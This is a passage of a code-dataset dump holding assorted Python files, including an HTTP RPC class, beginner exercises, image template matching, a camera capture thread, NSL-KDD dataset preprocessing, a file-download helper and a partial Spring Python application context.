http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nclass HTTPRPC(object):\n def __init__(self):\n self.req_body = ''\n self.req_filter = ''\n self.req_params = {}\n self.req_method = ''\n self.rep_body = ''\n self.rep_status = ''\n\n def __str__(self):\n return str.format('REQ: body:{body} filter:{filter} '\n 'params:{params} method:{method} '\n 'REP: body:{rep_body} status:{status}',\n body=self.req_body, filter=self.req_filter,\n params=str(self.req_params), method=self.req_method,\n rep_body=self.rep_body, status=self.rep_status)\n","sub_path":"cmframework/src/cmframework/server/cmhttprpc.py","file_name":"cmhttprpc.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"392255370","text":"# Let us say that a list A is *sorted* if its elements are stored\n#in the ascending order. For instance, A=[1,3,3,4,8,12] is sorted\n#while A=[8,10,1,14,16] is not because 10>1. \n#Please write a program whose input is a list A and whose output\n#is `sorted' if A is sorted and `not sorted' otherwise.\n\n\nnumber = int (input('how many elements would you like to enter in your list'))\n\nmyList=[]\nfor i in range (0, number):\n element=int(input('enter a number'))\n myList.append(element)\n\n\nsortedL =1\nfor i in range(len(myList)-1):\n if(myList[i] > myList[i +1]):\n sortedL = 0\n break\nif(sortedL == 0):\n print('The list is not sorted')\nelse:\n print('The list is sorted')\n \n\n","sub_path":"Python lists/python lists5.py","file_name":"python lists5.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"85093768","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jul 14 20:09:12 2018\nInput: \t\n\n1 2 3\n4 5 6\n7 8 9\n\nReturn the following :\n\n[ \n [1],\n [2, 4],\n [3, 5, 7],\n [6, 8],\n [9]\n]\n@author: anu\nAccepted ** \n\"\"\"\n\nclass Solution:\n # @param A : list of list of integers\n # @return a list of list of integers\n def diagonal(self, A):\n res=[]\n n=len(A[0])\n \n for i in range(n):\n L=[]\n k=i \n for j in range(i+1): \n L.append(A[j][k])\n k-=1\n print(L)\n res.append(L)\n for i in range(1,n):\n L=[]\n k=n-1 \n for j in range(i,n): \n L.append(A[j][k])\n k-=1\n print(L)\n res.append(L) \n\n return res\n \n \ns=Solution()\nprint(s.diagonal([[1,2,3,4],[5,6,7,8],[9,10,11,12],[13,14,15,16]]))\n","sub_path":"array/antiDiagonals.py","file_name":"antiDiagonals.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"306084648","text":"import numpy as np\nfrom scipy.signal import correlate2d\n#import itk\nfrom skimage import io\n#from itkwidgets import view\n#import itkwidgets\nfrom IPython.display import display\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom os.path import isfile , join\nfrom PIL import Image\n#from cvutils import rgb2gray\n#import cv2\nfrom skimage.color import rgb2gray\nimport Feature_ext\nimport importlib\nimportlib.reload(Feature_ext)\n\n\ndef match_template_corr( x , temp ):\n y = np.empty(x.shape)\n y = correlate2d(x,temp,'same')\n return y \n\n#______Method 1: Direct 2D correlation of the image with the zero-mean template\n\ndef match_template_corr_zmean( x , temp ):\n return match_template_corr(x , temp - temp.mean())\n\n\ndef image():\n imgs_dir1 = 'images'\n imgs_names1 = ['chess.jpg']\n imgs_fnames1 = [ join( imgs_dir1, img_name1) for img_name1 in imgs_names1 ]\n imgs_rgb1 = [ np.array(Image.open(img1)) for img1 in imgs_fnames1 ]\n imgs_gray = [ rgb2gray( img1 ) for img1 in imgs_rgb1 ]\n \n imgs_dir = 'images'\n imgs_names = ['chess_templete.jpg']\n imgs_fnames = [ join( imgs_dir, img_name) for img_name in imgs_names ]\n imgs_rgb = [ np.array(Image.open(img)) for img in imgs_fnames ]\n Templete_gray = [ rgb2gray( img ) for img in imgs_rgb ]\n \n matches_corr_zmean = [ match_template_corr_zmean(x,h) for (x,h) in zip(imgs_gray,Templete_gray)]\n \n matches_corr_zmean_maxima = [ Feature_ext.Get_Maximum(x,min(t.shape)//8) for (x,t) in zip(matches_corr_zmean,Templete_gray)]\n \n\n\n\n patches = zip(imgs_gray,Templete_gray,\n matches_corr_zmean\n ,matches_corr_zmean_maxima)\n\n return patches\n\ndef method1_func(patches):\n for i,(im,temp,mcorrz,pcorrz) in enumerate(patches):\n def get_rect_on_maximum(y,template):\n ij = np.unravel_index(np.argmax(y), y.shape)\n x, y = ij[::-1]\n # highlight matched region\n htemp, wtemp = template.shape\n rect = plt.Rectangle((x-wtemp/2, y-htemp/2), wtemp, htemp, edgecolor='r', facecolor='none')\n return rect,x,y\n \n def make_rects(plt_object,xy,template):\n htemp, wtemp = template.shape\n for ridx in range(xy.shape[0]):\n y,x = xy[ridx]\n r = plt.Rectangle((x-wtemp/2, y-htemp/2), wtemp, htemp, edgecolor='g', facecolor='none')\n plt_object.add_patch(r)\n \n def make_circles(plt_object,xy,template):\n htemp, wtemp = template.shape\n for ridx in range(xy.shape[0]):\n y,x = xy[ridx]\n plt_object.plot(x, y, 'o', markeredgecolor='g', markerfacecolor='none', markersize=20)\n \n \n \n ##########Display Image \n \n r,x,y = get_rect_on_maximum(mcorrz,temp)#####get maximum to put rects\n #______________________show matching space_____________________ \n fig1, ax1 = plt.subplots(figsize = (5, 10))\n plt.autoscale(True)\n \n ax1.imshow(mcorrz, cmap=plt.get_cmap('gray'))\n matching_space_image=make_circles(ax1, pcorrz,temp)####put circles on image\n ax1.plot(x, y, 'o', markeredgecolor='r', markerfacecolor='none', markersize=20)\n \n plt.gca().set_axis_off()\n plt.gca().xaxis.set_major_locator(plt.NullLocator())\n plt.gca().yaxis.set_major_locator(plt.NullLocator())\n plt.savefig('matching_space.jpg', dpi=900, bbox_inches='tight',pad_inches=0)\n plt.show(matching_space_image) \n \n \n \n #_______________________show detected patterns___________________-\n fig2, ax2 = plt.subplots(figsize = (5, 10))\n plt.autoscale(True) \n \n ax2.imshow(im, cmap=plt.get_cmap('gray'))\n make_rects( ax2 , pcorrz, temp )\n detected_patterns_image=ax2.add_patch(r) ####put rects on image\n plt.gca().set_axis_off()\n plt.gca().xaxis.set_major_locator(plt.NullLocator())\n plt.gca().yaxis.set_major_locator(plt.NullLocator())\n plt.savefig('template_matching.jpg', dpi=900, bbox_inches='tight',pad_inches=0)\n plt.show(detected_patterns_image) \n \n\n#patches=image()\n#method1_func(patches)","sub_path":"Matching_Methods/method1.py","file_name":"method1.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"54548253","text":"import logging\n\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)-8s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M',\n filename='spam.log',\n filemode='w')\n\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\n\nlogger = logging.getLogger('simple_example2')\nlogger.addHandler(ch)\n\nlogger.debug('debug message')\nlogger.info('info message')\nlogger.warn('warn message')\nlogger.error('error message')\nlogger.critical('critical message')\n","sub_path":"python_logging/logging_example2.py","file_name":"logging_example2.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"605322985","text":"#!/usr/bin/env python3\n# encoding:utf-8\nimport sys\nimport cv2\nimport time\nimport threading\nimport numpy as np\n\nif sys.version_info.major == 2:\n print('Please run this program with python3!')\n sys.exit(0)\n\nclass Camera:\n def __init__(self, resolution=(640, 480)):\n self.cap = None\n self.width = resolution[0]\n self.height = resolution[1]\n self.frame = None\n self.opened = False\n \n self.th = threading.Thread(target=self.camera_task, args=(), daemon=True)\n self.th.start()\n\n def camera_open(self):\n try:\n self.cap = cv2.VideoCapture(-1)\n self.cap.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc('Y', 'U', 'Y', 'V'))\n self.cap.set(cv2.CAP_PROP_FPS, 30)\n self.cap.set(cv2.CAP_PROP_SATURATION, 40)\n self.opened = True\n except Exception as e:\n print('打开摄像头失败:', e)\n\n def camera_close(self):\n try:\n self.opened = False\n time.sleep(0.2)\n if self.cap is not None:\n self.cap.release()\n time.sleep(0.05)\n self.cap = None\n except Exception as e:\n print('关闭摄像头失败:', e)\n\n def camera_task(self):\n while True:\n try:\n if self.opened and self.cap.isOpened():\n ret, frame_tmp = self.cap.read()\n if ret:\n self.frame = cv2.resize(frame_tmp, (self.width, self.height), interpolation=cv2.INTER_NEAREST) \n ret = False\n else:\n self.frame = None\n self.cap.release()\n cap = cv2.VideoCapture(-1)\n ret, _ = cap.read()\n if ret:\n self.cap = cap\n elif self.opened:\n self.cap.release()\n cap = cv2.VideoCapture(-1)\n ret, _ = cap.read()\n if ret:\n self.cap = cap \n else:\n time.sleep(0.01)\n except Exception as e:\n print('获取摄像头画面出错:', e)\n time.sleep(0.01)\n\nif __name__ == '__main__':\n my_camera = Camera()\n my_camera.camera_open()\n print('摄像头原始画面,未做畸变校正')\n while True:\n img = my_camera.frame\n if img is not None:\n cv2.imshow('img', img)\n key = cv2.waitKey(1)\n if key == 27:\n break\n my_camera.camera_close()\n cv2.destroyAllWindows()\n","sub_path":"src/SpiderPi/Camera.py","file_name":"Camera.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"606106147","text":"\n\nfrom xai.brain.wordbase.nouns._fastening import _FASTENING\n\n#calss header\nclass _FASTENINGS(_FASTENING, ):\n\tdef __init__(self,): \n\t\t_FASTENING.__init__(self)\n\t\tself.name = \"FASTENINGS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"fastening\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_fastenings.py","file_name":"_fastenings.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"155043623","text":"import pymysql\n\ndb = pymysql.connect(\n host=\"localhost\",\n port=8889,\n user=\"testuser\",\n password=\"test123\",\n db=\"personas\")\n\ncursor = db.cursor()\ncursor.execute(\"DROP TABLE IF EXISTS PESO\")\n\nsql = \"\"\"CREATE TABLE PESO (\n idPersona INT NOT NULL,\n fecha DATE NOT NULL,\n peso INT,\n \n PRIMARY KEY (idPersona, fecha),\n FOREIGN KEY (idPersona) REFERENCES PERSONA(idPersona) \n \n )\"\"\"\n\ncursor.execute(sql)\n\ntry:\n cursor.execute(sql)\n db.commit()\nexcept:\n db.rollback()\n","sub_path":"practico-03/ejercicio-07.py","file_name":"ejercicio-07.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"535881516","text":"\nimport sys\nimport numpy as np\nimport pdb\nfrom INapIKModel import INapIKModel\n\ndef main(argv):\n '''\n l = np.array([[.0435, -290.0], [.00015, -1]])\n v1 = np.array([1.0, .00015])\n v2 = np.array([1.0, .0034])\n lambda1 = 0.0\n lambda2 = -.9565\n\n lv1 = l.dot(v1)\n lv2 = l.dot(v2)\n lambda1v1 = lambda1*v1\n lambda2v2 = lambda2*v2\n pdb.set_trace()\n '''\n\n '''\n def zeroI(t):\n return 0.0\n # model = INapIKModel.getHighThresholdInstance(i=zeroI)\n model = INapIKModel.getLowThresholdInstance(i=zeroI)\n isn = 4.51\n vsn = -61.0559\n nsn = .0007\n res = model.checkStability(i0=isn, v0=vsn, n0=nsn)\n pdb.set_trace()\n '''\n\n v0 = -60.935\n n0 = .0007\n gl = 8.0\n gNa = 20.0\n gK = 10.0\n eNa = 60.0\n mVOneHalf = -20.0\n mK = 15.0\n def mInf(v):\n return(1.0/(1.0+np.exp((mVOneHalf-v)/mK)))\n mInfV0 = mInf(v=v0)\n dMInfV0 = -1.0/mK*(mInfV0-mInfV0**2)\n a = -gl-gNa*(dMInfV0*(v0-eNa)+mInfV0)-gK*n0\n pdb.set_trace()\n\nif __name__==\"__main__\":\n main(sys.argv)\n","sub_path":"scripts/doCheckTypoCh6_copy.py","file_name":"doCheckTypoCh6_copy.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"342373211","text":"import pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler, LabelEncoder\n\nfrom utils.preprocessing.utils import perform_scaling, inverse_scaling, drop_columns, read_csv\n\n\nclass Preprocess_nslkdd:\n def __init__(self, path):\n self.path = path\n\n self.columns = None\n\n self.scaler = None\n self.pca = None\n self.train_test_dimensions = None\n self.scale_number = 255\n self.cat_column_encoders = {}\n\n self.columns_to_drop = ['difficulty']\n self.cat_cols = ['protocol_type', 'service', 'flag']\n\n self.attack_mapping = {\n 'normal': 'normal',\n\n 'back': 'dos',\n 'land': 'dos',\n 'neptune': 'dos',\n 'pod': 'dos',\n 'smurf': 'dos',\n 'teardrop': 'dos',\n 'apache2': 'dos',\n 'udpstorm': 'dos',\n 'processtable': 'dos',\n 'worm': 'dos',\n\n 'satan': 'probe',\n 'ipsweep': 'probe',\n 'nmap': 'probe',\n 'portsweep': 'probe',\n 'mscan': 'probe',\n 'saint': 'probe',\n\n 'guess_passwd': 'R2L',\n 'ftp_write': 'R2L',\n 'imap': 'R2L',\n 'phf': 'R2L',\n 'multihop': 'R2L',\n 'warezmaster': 'R2L',\n 'warezclient': 'R2L',\n 'spy': 'R2L',\n 'xlock': 'R2L',\n 'xsnoop': 'R2L',\n 'snmpguess': 'R2L',\n 'snmpgetattack': 'R2L',\n 'httptunnel': 'R2L',\n 'sendmail': 'R2L',\n 'named': 'R2L',\n\n 'buffer_overflow': 'U2R',\n 'loadmodule': 'U2R',\n 'rootkit': 'U2R',\n 'perl': 'U2R',\n 'sqlattack': 'U2R',\n 'xterm': 'U2R',\n 'ps': 'U2R'\n }\n\n def set_columns(self, df):\n self.columns = list(df.columns)\n\n def add_cat_column_encoder(self, cat_name, encoder):\n self.cat_column_encoders[cat_name] = encoder\n\n def set_train_test_dimensions(self, train_test_dimensions):\n self.train_test_dimensions = train_test_dimensions\n\n def preprocess(self, x_sv_train, x_usv_train, x_test):\n scaler, x_sv_train, x_usv_train, x_test = perform_scaling(MinMaxScaler(), x_sv_train, x_usv_train, x_test)\n self.scaler = scaler\n\n return x_sv_train, x_usv_train, x_test\n\n def inverse_preprocessing(self, data):\n data = inverse_scaling(self.scaler, data)\n\n df = pd.DataFrame(data=data, columns=self.columns)\n\n for cat_col in self.cat_column_encoders:\n df[cat_col] = df[cat_col].astype(int)\n df[cat_col] = self.cat_column_encoders[cat_col].inverse_transform(df[cat_col])\n\n return df\n\n def initial_processing(self, data):\n initial_columns = [\"duration\", \"protocol_type\", \"service\", \"flag\", \"src_bytes\",\n \"dst_bytes\", \"land\", \"wrong_fragment\", \"urgent\", \"hot\", \"num_failed_logins\",\n \"logged_in\", \"num_compromised\", \"root_shell\", \"su_attempted\", \"num_root\",\n \"num_file_creations\", \"num_shells\", \"num_access_files\", \"num_outbound_cmds\",\n \"is_host_login\", \"is_guest_login\", \"count\", \"srv_count\", \"serror_rate\",\n \"srv_serror_rate\", \"rerror_rate\", \"srv_rerror_rate\", \"same_srv_rate\",\n \"diff_srv_rate\", \"srv_diff_host_rate\", \"dst_host_count\", \"dst_host_srv_count\",\n \"dst_host_same_srv_rate\", \"dst_host_diff_srv_rate\", \"dst_host_same_src_port_rate\",\n \"dst_host_srv_diff_host_rate\", \"dst_host_serror_rate\", \"dst_host_srv_serror_rate\",\n \"dst_host_rerror_rate\", \"dst_host_srv_rerror_rate\", \"label\", \"difficulty\"]\n\n train_data = read_csv(self.path['one'], columns=initial_columns)\n test_data = read_csv(self.path['two'], columns=initial_columns)\n\n data = train_data.append(test_data)\n del train_data, test_data\n\n data['label'] = data['label'].map(self.attack_mapping)\n\n data = drop_columns(data, self.columns_to_drop)\n\n for col in self.cat_cols:\n if col in data.columns:\n le = LabelEncoder()\n le.fit(list(data[col].astype(str).values))\n data[col] = le.transform(list(data[col].astype(str).values))\n self.add_cat_column_encoder(col, le)\n\n x_ben = data.loc[data['label'] == 'normal']\n x_fraud = data.loc[data['label'] != 'normal']\n\n x_ben = drop_columns(x_ben, ['label'])\n x_fraud = drop_columns(x_fraud, ['label'])\n\n return x_ben, x_fraud\n","sub_path":"utils/preprocessing/nslkdd.py","file_name":"nslkdd.py","file_ext":"py","file_size_in_byte":4654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"567000597","text":"import json\nfrom pathlib import Path\nfrom urllib import request\nimport os\nimport concurrent.futures as cf\n\nfrom ..utils import mkdir\n\ndef download_file(out_dir, link):\n \"\"\" Downloads a file from link and stores it in a specified\n directory\n\n Parameters\n ----------\n out_dir: Path\n Where the file is to be stored\n \n link: str\n URL of the file\n\n Examples\n --------\n > download_file(\"output.dat\", url)\n \"\"\"\n os.system('curl \"{}\" -o \"{}\"'.format(link, out_dir))\n\ndef atexit_restore(dir):\n \"\"\" Make sure the working directory is restored\n even if script is terminated (for Jupyter notebook)\n\n Parameters\n ----------\n dir: Path\n The working directory to be restored\n \n Examples\n --------\n > os.chdir(temporary_path)\n > atexit_restore(origin_path)\n \"\"\"\n import atexit\n def exit_handler():\n os.chdir(dir)\n atexit.register(exit_handler)\n\ndef download_all(input_dir, output_dir=None):\n \"\"\" Downloads all the links in jazz.json and classical.json\n Creates the jazz/ and classical/ directories if not already\n there\n\n Parameters\n ----------\n input_dir: Path\n Directory where the json files are\n \n output_dir: Union(None, Path)\n Where the downloaded files are to be stored. By default,\n it's the same as the input_dir\n \n Examples\n --------\n > download_all(dir_json_is_in, Path(\"output\"))\n \"\"\"\n \n if output_dir is None:\n output_dir = input_dir\n\n current_dir = os.getcwd() # to be restored later\n input_dir = input_dir.resolve()\n output_dir = output_dir.resolve() # resolve first, since we're changing working directory\n\n os.chdir(input_dir)\n atexit_restore(current_dir)\n\n NUM_CPUS = None # defaults to all available\n for input_file in input_dir.glob(\"*.json\"):\n mkdir(input_file.stem)\n with cf.ProcessPoolExecutor(NUM_CPUS) as pp: # for multi-threading\n if not Path(input_file).exists():\n raise \"JSON File does not exist\"\n with open(input_file, \"r\") as f:\n data = json.load(f)\n for d in data:\n dl_url = Path(d[\"dl\"]) \n out_name = output_dir / input_file.stem / dl_url.name.lower()\n\n pp.submit(download_file, out_name, str(dl_url))\n \n os.chdir(current_dir) # restore working directory","sub_path":"src/data/acquire_data/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"144249003","text":"# 模板变量\n# 代码中传入字符串、列表、字典到模板中\n\nfrom flask import Flask,render_template\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef index():\n # 往模板中传入的数据\n my_str = 'Hello Word'\n my_int = 10\n my_array = [3,4,2,1,7,9]\n my_dict = {\n \"name\":\"xiaoming\",\n \"age\":18\n }\n\n return render_template(\"hello1.html\",\n my_str=my_str,\n my_int=my_int,\n my_array=my_array,\n my_dict=my_dict)\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n","sub_path":"after/1122/Falsk模板/demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"250563889","text":"#encoding: utf-8\nfrom OpenOrange import *\nfrom Currency import Currency\nfrom Cheque import Cheque\n\nParentChequeBounce = SuperClass(\"ChequeBounce\", \"FinancialTrans\", __file__)\nclass ChequeBounce(ParentChequeBounce):\n\n OperationTypes = [\"ChequeBounceo\",\"Venta\",\"Rechazo\"]\n\n def defaults(self):\n ParentChequeBounce.defaults(self)\n self.TransDate = today()\n self.OperationType = 0\n self.Type = 0\n\n def check(self):\n result = ParentChequeBounce.check(self)\n if not result: return result\n cheque = Cheque.bring(self.ChequeNr)\n if not cheque: return True\n if self.unconfirming():\n if not (cheque.Status == 7):\n return self.FieldErrorResponse(\"CHEQUESTATUSERR\",\"ChequeNr\")\n else:\n if (self.OperationType==0) and not (cheque.Status == 2 or cheque.Status == 6):\n return self.FieldErrorResponse(\"CHEQUESTATUSERR\",\"ChequeNr\")\n if (self.OperationType==1) and (cheque.Status != 1):\n return self.FieldErrorResponse(\"CHEQUESTATUSERR\",\"ChequeNr\")\n if (self.OperationType==2) and (cheque.Status != 3):\n return self.FieldErrorResponse(\"CHEQUESTATUSERR\",\"ChequeNr\")\n if (not self.ChequeNr):\n return self.FieldErrorResponse(\"NONBLANKERR\",\"ChequeNr\")\n return result\n\n def pasteChequeNr(self):\n cheque = Cheque.bring(self.ChequeNr)\n if (cheque):\n self.CustCode = cheque.CustCode\n self.CustName = cheque.CustName\n self.Total = cheque.Amount\n if (self.OperationType==0):\n from Deposit import Deposit\n chqdep = cheque.getDeposit()\n if chqdep:\n self.FinIdent = chqdep.FinIdent\n else:\n self.CustCode = None\n self.CustName = None\n self.Total = None\n self.FinIdent = None\n\n def beforeInsert(self):\n res = ParentChequeBounce.beforeInsert(self)\n if not res: return res\n if self.confirming():\n res = self.changeChequeStatus()\n if not res: return res\n return True\n\n def beforeUpdate(self):\n res = ParentChequeBounce.beforeUpdate(self)\n if not res: return res\n if self.confirming() or self.unconfirming():\n res = self.changeChequeStatus(self.unconfirming())\n if not res: return res\n return True\n\n def invalidate(self):\n res = ParentChequeBounce.invalidate(self)\n if not res: return res\n return self.changeChequeStatus(True)\n\n def getNLTTrans(self):\n from NLT import NLT\n nlt = NLT()\n nlt.OriginType = self.Origin[self.name()]\n nlt.OriginNr = self.SerNr\n if nlt.load():\n return nlt\n return None\n\n def getNLTComment(self):\n res = tr(\"Cheque Bounce\")\n return res\n\n def genNLTTrans(self):\n from AccountSettings import AccountSettings\n ac = AccountSettings.bring()\n from FinAccount import FinAccount\n from Cheque import Cheque\n nlt = self.NLTSetup()\n if self.OperationType == 0: #Rechazo bancario\n nlt.addRow(ac.BouncedChqAcc, \"\", self.Total,self.Currency,self.CurrencyRate,self.BaseRate)\n fa = FinAccount.bring(self.FinIdent)\n cheque = Cheque.bring(self.ChequeNr)\n text = \"ChqNro: (%s)\" % (cheque.ChequeNr)\n nlt.addRow(fa.Account, \"\", -self.Total,self.Currency,self.CurrencyRate,self.BaseRate,text)\n elif self.OperationType == 1: #Rechazo interno\n nlt.addRow(ac.InternalBouncedChqAcc, \"\", self.Total,self.Currency,self.CurrencyRate,self.BaseRate)\n cheque = Cheque.bring(self.ChequeNr)\n ba = cheque.getBridgeAccount()\n if ba:\n nlt.addRow(ba,\"\",-self.Total,self.Currency,self.CurrencyRate,self.BaseRate)\n elif self.OperationType == 2: #Rechazo endoso\n nlt.addRow(ac.BouncedChqAcc, \"\", self.Total,self.Currency,self.CurrencyRate,self.BaseRate)\n nlt.addRow(ac.BouncedChqDueAcc, \"\", -self.Total,self.Currency,self.CurrencyRate,self.BaseRate)\n nlt.balance()\n nlt.sumUp()\n return nlt.save()\n\n def changeChequeStatus(self,Revert=False):\n cheque = Cheque.bring(self.ChequeNr)\n if not Revert:\n cheque.Status = Cheque.BOUNCED\n else:\n if self.OperationType == 0:\n cheque.Status = Cheque.DEPOSITED\n elif self.OperationType == 1:\n cheque.Status = Cheque.INPORTFOLIO\n elif self.OperationType == 2:\n cheque.Status = Cheque.ENDOSED\n return cheque.store()\n\n def genDebitNote(self):\n from Invoice import Invoice,InvoiceItemRow\n dnote = Invoice()\n dnote.defaults()\n dnote.CustCode = self.CustCode\n dnote.pasteCustCode()\n dnote.InvoiceType = 2\n dnote.OriginNr = self.SerNr\n dnote.OriginType = dnote.Origin[self.name()]\n from FinSettings import FinSettings\n fset = FinSettings.bring()\n from TaxSettings import TaxSettings\n tset = TaxSettings.bring()\n\n #Item de cheque\n from Cheque import Cheque\n chq = Cheque.bring(self.ChequeNr)\n irow = InvoiceItemRow()\n irow.ArtCode = fset.ChqBounceItem\n irow.pasteArtCode(dnote)\n \n irow.Name = \"%s - Chq. Nr. %s - %s\" %(irow.Name,chq.ChequeNr,chq.BankName)\n irow.Qty = 1\n irow.VATCode = tset.getExcemptVATCode()\n irow.Price = self.Total\n irow.pastePrice(dnote)\n irow.sumUp(dnote)\n dnote.Items.append(irow)\n\n if (fset.ChqBounceBankCostItem):\n irow = InvoiceItemRow()\n irow.ArtCode = fset.ChqBounceBankCostItem\n irow.pasteArtCode(dnote)\n irow.Qty = 1\n irow.pasteQty(dnote)\n irow.sumUp(dnote)\n dnote.Items.append(irow)\n dnote.sumUp()\n return dnote","sub_path":"standard/records/ChequeBounce.py","file_name":"ChequeBounce.py","file_ext":"py","file_size_in_byte":6019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"311488838","text":"'''\nCreated on Feb 27, 2019\nconstruct corest using \"uniform\" subsampling method\n\n@author: Ying Cai, Wenxing Zhang\n'''\nimport numpy as np\nimport argparse\n\ndef fwrite_vector(f, vec):\n for item in vec:\n f.write(str(item)+' ')\n \n\nif __name__ == '__main__':\n \n parser = argparse.ArgumentParser(description='Lightweight coreset construction')\n parser.add_argument('filename', type=str, help='file name')\n parser.add_argument('numOfVariable', type=int, help='number of attributes') \n parser.add_argument('samplesize', type=int, help='coreset size')\n parser.add_argument('--numOfCorset', type=int, default=1, help='number of coresets to construct')\n args = parser.parse_args()\n numOfVariable = args.numOfVariable\n filename = args.filename\n samplesize = args.samplesize\n numOfCorset = args.numOfCorset\n \n dataset=[]\n with open(filename) as fn:\n for line in fn:\n data = line.split()\n data[numOfVariable-1] = data[numOfVariable-1].strip()\n vlist=[]\n for value in data:\n vlist.append(float(value))\n dataset.append(vlist)\n\n fn.close()\n \n \n nsize = len(dataset)\n \n size=[]\n \n for x in range(nsize):\n size.append(x)\n \n for sampleTimes in range(numOfCorset):\n chosen = np.random.choice(size, samplesize, replace=False)\n with open(filename[:-4]+'_UNIFORM_'+str(samplesize)+\"_\"+str(sampleTimes+1) + \".txt\",'w',encoding='utf-8') as f:\n for item in chosen:\n fwrite_vector(f, dataset[item])\n f.write('\\n')\n f.close()\n","sub_path":"NewVersion/sourcecode/uniform.py","file_name":"uniform.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"123051089","text":"\"\"\"Reverse of a given number.\n\nAlgo\n----\n\n00. Start\n01. Read a number n\n02. rev = 0\n03. i = n\n04. rem = i%10 This gives the last digit in the number\n05. rev = rev * 10 + rem\n06. i = i // 10 This gives the rest of the number without the last digit\n07. if i > 0 go to step 04\n08. Print rev\n09. Stop\n\n\nn i rem rev\n1234 0\n 1234 4 0*10 + 4 = 4\n 123 3 4*10 + 3 = 43\n 12 2 43*10 + 2 = 432\n 1 1 432*10 + 1 = 4321\n 0\n\n\n10) 1 (0\n 0\n ---\n 1\n\n1 % 10 = 1\n1 // 10 = 0\n\n\nFor loop in C based programming languages\n\nfor(int i=0; i <10; i = i+1){\n ...\n ...\n}\n\nfor(Starting; condition; incrementing){\n\n}\n\nfor(;0 == 0;) -> Infinite for loop\n\"\"\"\n\n\ndef get_reverse(n):\n \"\"\"Get reverse of a number.\"\"\"\n rev = 0\n i = n\n while i > 0:\n rem = i % 10\n rev = rev * 10 + rem\n i = i // 10\n\n return rev\n\n\ndef test_get_reverse():\n \"\"\"Test get reverse of a number.\"\"\"\n assert get_reverse(1234) == 4321\n assert get_reverse(3445) == 5443\n","sub_path":"practise-project/src/Week03/test_reverse_of_a_number_sol_2.py","file_name":"test_reverse_of_a_number_sol_2.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"11608065","text":"\"\"\"\n Copyright 2006-2008 SpringSource (http://springsource.com), All Rights Reserved\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License. \n\"\"\"\nimport logging\nfrom springpython.container import ObjectContainer\nfrom springpython.remoting.pyro import PyroProxyFactory\n\nclass ApplicationContext(ObjectContainer):\n \"\"\"\n ApplicationContext IS a ObjectContainer. It also has the ability to define the lifecycle of\n objects.\n \"\"\"\n def __init__(self, config=None):\n super(ApplicationContext, self).__init__(config)\n self.logger = logging.getLogger(\"springpython.context.ApplicationContext\")\n self.types_to_avoid = [PyroProxyFactory]\n \n for object_def in self.object_defs.values():\n self._apply(object_def)\n \n for configuration in self.configs:\n self._apply(configuration)\n\n for object_def in self.object_defs.values():\n if not object_def.lazy_init and object_def.id not in self.objects:\n self.logger.debug(\"Eagerly fetching %s\" % object_def.id)\n self.get_object(object_def.id)\n\n post_processors = [object for object in self.objects.values() if isinstance(object, ObjectPostProcessor)]\n\n for obj_name, obj in self.objects.iteritems():\n if not isinstance(obj, ObjectPostProcessor):\n for post_processor in post_processors:\n self.objects[obj_name] = post_processor.post_process_before_initialization(obj, obj_name)\n\n\n for object in self.objects.values():\n self._apply(object)\n\n for obj_name, obj in 